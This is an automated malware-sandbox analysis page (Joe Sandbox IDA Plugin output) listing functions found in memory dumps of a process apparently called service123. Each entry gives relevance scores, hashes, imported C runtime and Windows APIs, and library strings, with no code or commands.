Instruction ID: 1ba72e763cb632071f761eb087828fb7e2b0e8e37a7ba321025da8812d286e0b
Opcode Fuzzy Hash: db2345f21485fb0801d4577d8e06bc355c267276d9e6f75e731e45d6b3aa541d
Instruction Fuzzy Hash: 57F1AE7270C3858BD721CF28C45039ABBE6AF85318F158A5DE9DC87781D7359A09CF86

Function 00533160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 0053342A
0, xrefs: 005334C6

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: 89ccf77062db85b1a5091145d85a7e7c3f0f83e83ad7703ae317a9fff3ea99db
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: 2FC16A71E006168BDB15CF6CC48479EBBF1BF88314F29C669E858AB389D734E945CB90

Function 6C303830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

@, xrefs: 6C303AFA
0, xrefs: 6C303B96

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 263fcd8dd8ea96aeb80ccb7a2a6e14582c670e497a385206b3118347010c277d
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 4CC16B72F046158BDB44CF6CC481B8DBBF5AF89318F198259E854AB785D335E845CF90

Function 6C31B5C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31B5E6
memcmp.MSVCRT ref: 6C31B60A
memcmp.MSVCRT ref: 6C31B67D
memcmp.MSVCRT ref: 6C31B6EF

Part of subcall function 6C3BAB60: strlen.MSVCRT ref: 6C3BAB6E

memcmp.MSVCRT ref: 6C31B787

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C31B631, 6C31B6A2, 6C31B715, 6C31B7AE, 6C31B7CA
basic_string::compare, xrefs: 6C31B629, 6C31B69A, 6C31B70D, 6C31B7A6, 6C31B7C2

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 3a52fb924db641b7c38cd7a29fcdc1857d65ccf904a02538244ee0054f21ff9e
Instruction ID: 1dc96134959e8ff207a524ffa53ac1937d7822fde03d047166f4817c558124eb
Opcode Fuzzy Hash: 3a52fb924db641b7c38cd7a29fcdc1857d65ccf904a02538244ee0054f21ff9e
Instruction Fuzzy Hash: 7B6127B660A3119FC704DF29C9C195ABBE5BF98A58F15892DE4C887B11E331E844CF53

Function 6C3174C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3630D0: memset.MSVCRT ref: 6C363115

strcmp.MSVCRT ref: 6C317521
strlen.MSVCRT ref: 6C31753C
strlen.MSVCRT ref: 6C317583
strlen.MSVCRT ref: 6C3175F4
strlen.MSVCRT ref: 6C317662

Strings

*, xrefs: 6C317740

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: 937dcb9ed5627dc2cfe09417d475b0a38ec0b97748fa5d468524ea7dd88c912d
Instruction ID: 81ce1699ab6208dd83b46d8f2422cb3a73b7112156930223dc447d4d5036867f
Opcode Fuzzy Hash: 937dcb9ed5627dc2cfe09417d475b0a38ec0b97748fa5d468524ea7dd88c912d
Instruction Fuzzy Hash: F28125B5A096008FDB04DF29C48869AFBF5FF86308F45856DD8859BB14D735A809CF92

Function 6C2FE8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 71da4e19df3463f5a611646b1fc27a5707331813cce73770064c463e1371cae3
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: B451887058970E8FC712DF19C08065AF7E2BF89308F444A5AFCA89B754D730D90ACBA6

Function 6C2FE340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2FE487
WaitForSingleObject.KERNEL32 ref: 6C2FE4C8

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 710524b3e5d5eaf2892d3f7f4420384aed1a53b61a689375ef2dff00579e69e4
Instruction ID: 584fb0a2d56347b6d4b5b46b03fdac22594ef5d94282a2d92217cdcd19a8821e
Opcode Fuzzy Hash: 710524b3e5d5eaf2892d3f7f4420384aed1a53b61a689375ef2dff00579e69e4
Instruction Fuzzy Hash: 9851747078930A8FDB11EF39C58876ABBF5BB06309F10452CECA987B40D771E5468B92

Function 6C3001F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C300209
memcpy.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C30022D
malloc.MSVCRT ref: 6C300247
memset.MSVCRT ref: 6C300275
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: d4a1be6c2d00ff967c8b11b37f49145888bf2f4b8e8518f38a9d160a12b41dc3
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: FD1151B27057459FD700AF69D88589AF7E8EF44258F05897DD888C7B00E731D948CF62

Function 00538120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0053812C
GetProcAddress.KERNEL32 ref: 0053814C
GetProcAddress.KERNEL32 ref: 0053818B

Strings

msvcrt.dll, xrefs: 00538125
__lc_codepage, xrefs: 00538180
___lc_codepage_func, xrefs: 00538144

Memory Dump Source

Source File: 00000004.00000002.2936168593.0000000000531000.00000020.00000001.01000000.00000005.sdmp, Offset: 00530000, based on PE: true

Associated: 00000004.00000002.2936139701.0000000000530000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936188368.000000000053A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936205429.000000000053E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2936222214.0000000000541000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_530000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: bc1991a4ed93dd8da46b8aec8ec6d1b5ab9d286a2b010b1fc119c28b4602feb0
Instruction ID: 5b597ad2b6ac5f618436ebe4891c087fecf3e1e56a60c80279929c11d4bfb5ce
Opcode Fuzzy Hash: bc1991a4ed93dd8da46b8aec8ec6d1b5ab9d286a2b010b1fc119c28b4602feb0
Instruction Fuzzy Hash: 07F01DB09043118F9B147F78AE4926B7FF4FA04350F45453AE885C7340EAB4D459DBA3

Function 6C309171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C30917C
GetProcAddress.KERNEL32 ref: 6C30919C
GetProcAddress.KERNEL32 ref: 6C3091DB

Strings

___lc_codepage_func, xrefs: 6C309194
msvcrt.dll, xrefs: 6C309175
__lc_codepage, xrefs: 6C3091D0

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: a2ee820d781642f25561222ff989413b35e6346ef5ea2b94d8e221979327e974
Instruction ID: aaee30fbba6ba94d5f091a38052fd58b5ac88a00c15ee1f1db42d9e20e991243
Opcode Fuzzy Hash: a2ee820d781642f25561222ff989413b35e6346ef5ea2b94d8e221979327e974
Instruction Fuzzy Hash: BBF096B7B853018BAB00BF7C994B25A7BF4A609214F41053DD989C7601E331D410CFE3

Function 6C2FEA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: fe116ca529c5a9a6f23b12471737002675ddae84a30a09849e46594609669d71
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: 4FB01272ED932D8E4421697C0515094E21DA6173493445C43CCAA63D048323E48B4A63

Function 6C394890 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C39B65E), ref: 6C394913
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C39B65E), ref: 6C394955

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 5150801cd1dcacbfe5238fa583dc26a361dcc11913f16922a1010c0b55ca1443
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: B761E3B5A09701CFC714DF29D58051AFBE0EF98758F24892EE4AA8B761E731E844CF52

Function 6C390720 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C329053,00000003), ref: 6C39079D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C329053,00000003), ref: 6C3907DC

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: 8b49b851c693572a2e6939ee1d6f83b26a9e20e54a66059b071aa6cad801fd7b
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 9061D2B4609742CFC704DF19C58051AFBE1AF98764F20891DE8EA8B761E731E845CF92

Function 6C392940 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C38711E), ref: 6C3929B3

Strings

basic_string::basic_string, xrefs: 6C392ABC, 6C392B19
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C392AC4, 6C392B21, 6C392B86
string::string, xrefs: 6C392B7E
basic_string::_M_create, xrefs: 6C3929CA, 6C392A6A

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: 88591001a90ef2187a17319830fe2e27a8f74f82b8458ec85924d2dfc3528bb9
Instruction ID: fbd710d34ff3cb98a7f9104775ffacce42629acdc8a92028bac8181cd6825194
Opcode Fuzzy Hash: 88591001a90ef2187a17319830fe2e27a8f74f82b8458ec85924d2dfc3528bb9
Instruction Fuzzy Hash: AB715FB69097508FC300DF2CD58064AFBE4BF89618F558A9EE8889B715D331D945CF92

Function 6C2FEB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: a3a6ff52e840b4c32f8170dbd9de57f6c8f08a7c9a4eb385cc61c5033c4fdf3e
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 83619D7568930D8FD311CF19C49065AF7E6AF88318F448A2EFCA89BB44D730D9478B96

Function 6C30AE10 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C30ACEF), ref: 6C3C5FF0
abort.MSVCRT(?,?,?,?,?,?,6C30AC4C,?,?,?,?,?,?,6C3C6040), ref: 6C3C5FF8
abort.MSVCRT(?,?,?,?,?,?,6C30AC4C,?,?,?,?,?,?,6C3C6040), ref: 6C3C6000
abort.MSVCRT(?,?,?,?,?,?,6C30AC4C,?,?,?,?,?,?,6C3C6040), ref: 6C3C6008

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 80c6e4b50a5e7bf0aef3c72f1705f4e59e3e7c80f2bab6d09286ee8147a29a1f
Instruction ID: 02ef20a30712265d87a11627aeaa4fc0174501eecd5beb41aedaa3c724763c79
Opcode Fuzzy Hash: 80c6e4b50a5e7bf0aef3c72f1705f4e59e3e7c80f2bab6d09286ee8147a29a1f
Instruction Fuzzy Hash: FC41E2727083148BC704AF78D4816EEB7E5AF8220CF15496DD5C48BB15DB36988ACFA3

Function 6C2F1020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C2F1281,?,?,?,?,?,?,6C2F13AE), ref: 6C2F1057
_amsg_exit.MSVCRT ref: 6C2F1086

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 2cb8b33c496b4bf920b51eed204640eb480df6a36abc5d10fc09351b3973cc70
Instruction ID: a48ea27c56f298bbcba92a6ae5dae85cb010a685790f3896a9cf938c667b3c43
Opcode Fuzzy Hash: 2cb8b33c496b4bf920b51eed204640eb480df6a36abc5d10fc09351b3973cc70
Instruction Fuzzy Hash: BC3171B178C3498FDB00EF19C582B66BAF0EB42398F91451DE8A48BF40DA31C485CB92

Function 6C311CB0 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C311CC8
strlen.MSVCRT ref: 6C311CD2
memcpy.MSVCRT ref: 6C311CEF
setlocale.MSVCRT ref: 6C311D02
wcsftime.MSVCRT ref: 6C311D26
setlocale.MSVCRT ref: 6C311D38

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction ID: 00448e002329744e4cae63569e9bf836bb4a77326e9f9ef5e20e9a41a9177266
Opcode Fuzzy Hash: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction Fuzzy Hash: 8411C2B1609310AFC340AF69C48469EFBE4BF88654F41882DE4C987710E7789844CF93

